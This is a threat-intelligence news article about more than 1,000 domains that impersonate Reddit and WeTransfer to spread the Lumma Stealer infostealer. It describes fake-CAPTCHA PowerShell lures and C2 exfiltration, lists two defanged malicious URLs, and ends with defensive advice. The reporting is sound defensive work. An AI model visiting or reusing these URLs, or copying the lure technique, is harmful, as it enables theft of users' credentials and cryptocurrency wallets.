1,000+ Malicious Domains Mimic Reddit & WeTransfer To Deliver Malware

Over 1,000 malicious domains have been identified that impersonate popular platforms like Reddit and WeTransfer to distribute malware, primarily the notorious Lumma Stealer.

This alarming trend highlights the increasing sophistication of cybercriminals who exploit trusted brands to deceive users into unwittingly downloading harmful software.

The Lumma Stealer malware, which has gained traction since its emergence in 2022, is a potent information-stealing tool designed to harvest sensitive data from infected systems.

It targets a wide array of information, including passwords, cryptocurrency wallet details, and browser data.

Security analyst at Sekoia, crep1x noted that the malware operates on a Malware-as-a-Service (MaaS) model, making it accessible to a broader range of cybercriminals who can easily deploy it against unsuspecting victims.

Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free

Attack Analysis

The malicious domains mimic legitimate URLs closely, such as:

• hxxps://reddit-15.gmvr.org/topic/inxcuh?engine=opentext+encase+forensic
• hxxps://wettransfer80.tynd.org/file/abbstd

These domains are crafted to look authentic and often feature valid SSL certificates, misleading users into believing they are visiting secure sites.

This tactic exploits the trust users place in the padlock symbol that indicates a secure connection. Cybersecurity experts warn that this method significantly increases the likelihood of users falling victim to phishing attempts.

Lumma Stealer employs various techniques to execute its payload. One common method involves fake CAPTCHA pages hosted on phishing sites.

These pages trick users into executing PowerShell scripts that download the malware onto their devices. Once installed, Lumma Stealer communicates with Command and Control (C2) servers via HTTP POST requests to exfiltrate stolen data.

The malware is capable of scanning for specific files containing sensitive information, such as those related to cryptocurrency wallets and passwords.

The rise in these malicious domains is indicative of a broader trend where attackers exploit established platforms’ reputations.

For instance, phishing campaigns often utilize social engineering tactics that involve sending emails with links leading to these fraudulent sites. Users may receive notifications that appear legitimate but ultimately redirect them to these malicious domains.

Moreover, the use of CDNs for hosting these phishing sites allows attackers to bypass traditional security measures. By leveraging the infrastructure of reputable services, they can evade detection and maintain longer operational lifespans for their attacks.

To combat this growing threat, cybersecurity professionals recommend several strategies:

• Verify URLs: Always check the URL for discrepancies before entering sensitive information.
• Enable Two-Factor Authentication: This adds an extra layer of security even if credentials are compromised.
• Educate Users: Awareness campaigns about phishing tactics can help users recognize and avoid potential threats.

Integrating Application Security into Your CI/CD Workflows Using Jenkins & Jira -> Free Webinar